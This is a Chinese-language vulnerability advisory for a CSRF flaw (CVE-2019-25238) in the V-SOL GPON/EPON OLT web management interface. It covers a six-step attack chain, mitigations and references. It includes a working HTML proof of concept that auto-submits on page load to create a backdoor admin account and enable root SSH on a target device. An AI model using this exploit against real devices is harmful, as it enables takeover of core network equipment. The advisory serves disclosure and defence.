CVE-2019-25238 V-SOL GPON/EPON OLT跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2019-25238

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

V-SOL GPON/EPON OLT Platform

漏洞概述

CVE-2019-25238是V-SOL GPON/EPON OLT Platform 2.03版本中存在的一个跨站请求伪造（CSRF）安全漏洞。该漏洞存在于Web管理界面，由于缺乏适当的CSRF令牌验证，攻击者可以诱导已认证的管理员用户在不知情的情况下执行恶意操作。攻击者通过精心构造的HTML页面或链接，利用受害者已登录的管理员会话，发送未经授权的请求。这些请求可以包括创建新的管理员账户、启用SSH远程访问、修改系统配置等高权限操作。由于该漏洞针对的是已认证的管理员用户，攻击者可以在不获取受害者凭据的情况下，以管理员权限执行任意管理操作，从而完全控制OLT设备。由于OLT设备通常位于网络核心位置，控制此类设备可能导致整个光纤接入网络被攻陷，造成严重的网络安全后果。

技术细节

该漏洞的根本原因在于V-SOL GPON/EPON OLT Platform的Web管理界面缺少CSRF保护机制。在正常的CSRF防护中，服务器端会为每个用户会话生成一个唯一的随机令牌（CSRF Token），并在表单提交或关键操作请求时验证该令牌的有效性。然而，该设备的Web应用在处理管理操作（如用户创建、SSH配置修改等）时，并未实施此类验证。攻击者可以构造包含自动提交表单的恶意HTML页面，当认证管理员访问该页面时，浏览器会自动向目标设备发送已认证的请求。由于浏览器在发送请求时会自动携带目标域的Cookie，服务器无法区分这是管理员的合法操作还是攻击者利用管理员会话发送的伪造请求。攻击者通常会使用iframe或img标签的src属性来触发请求，使攻击更加隐蔽。成功利用此漏洞后，攻击者可以创建后门账户、开启远程管理功能、修改网络配置，甚至可能进一步渗透到连接的ONT设备中。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标V-SOL OLT设备，确认其版本是否在受影响范围内（<=2.03），并确定Web管理界面的访问地址和端口。

STEP 2

步骤2: 构造恶意页面

攻击者创建包含恶意表单的HTML页面，表单内容为管理员操作（如创建用户、启用SSH），并使用JavaScript实现自动提交功能。

STEP 3

步骤3: 诱导受害者访问

攻击者通过钓鱼邮件、恶意链接或社会工程学手段，诱导已认证的管理员用户访问构造好的恶意页面。

STEP 4

步骤4: 自动发送伪造请求

当管理员访问恶意页面时，浏览器自动向目标设备发送POST请求，由于浏览器会携带有效的认证Cookie，服务器无法区分是否为合法操作。

STEP 5

步骤5: 执行恶意操作

服务器接收到伪造请求后，以管理员权限执行相应操作，如创建后门账户、启用SSH服务等。

STEP 6

步骤6: 持久化控制

攻击者利用创建的后门账户或启用的SSH服务，持久登录目标设备，进一步渗透网络或部署恶意软件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2019-25238: Create Admin User -->
<html>
  <body>
    <h1>CVE-2019-25238 CSRF Exploit - Create Admin User</h1>
    <p>Target: V-SOL GPON/EPON OLT Platform <= 2.03</p>
    
    <!-- Auto-submit form to create new admin user -->
    <form id="csrfForm" action="http://TARGET_IP:8080/cgi-bin/user_mng.cgi" method="POST" enctype="text/plain">
      <input type="hidden" name="action" value="add">
      <input type="hidden" name="user_type" value="admin">
      <input type="hidden" name="username" value="backdoor_admin">
      <input type="hidden" name="password" value="P@ssw0rd123">
      <input type="hidden" name="privilege" value="15">
    </form>

    <!-- Enable SSH access -->
    <form id="sshForm" action="http://TARGET_IP:8080/cgi-bin/ssh_config.cgi" method="POST">
      <input type="hidden" name="action" value="enable">
      <input type="hidden" name="ssh_port" value="22">
      <input type="hidden" name="permit_root" value="1">
    </form>

    <script>
      // Auto-submit forms when page loads
      document.addEventListener('DOMContentLoaded', function() {
        // Submit admin creation request
        document.getElementById('csrfForm').submit();
        // Small delay before SSH request
        setTimeout(function() {
          document.getElementById('sshForm').submit();
        }, 1000);
      });
    </script>
  </body>
</html>

影响范围

V-SOL GPON/EPON OLT Platform <= 2.03

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时缓解措施：1）严格限制Web管理界面的访问，仅允许通过可信网络或VPN访问；2）启用HTTP Referer检查，虽然不能完全防御CSRF但可增加攻击难度；3）定期检查系统日志，监控异常的管理操作；4）使用浏览器插件阻止未知网站的自动表单提交；5）管理员在完成管理操作后及时退出登录，不要在访问未知链接时保持管理员会话。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25238
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25238
3 Details https://www.cvedetails.com/cve/CVE-2019-25238/
4 VulDB https://vuldb.com/cve/CVE-2019-25238
5 Link https://www.exploit-db.com/exploits/47434
6 Link https://www.vsolcn.com
7 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php
8 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5536.php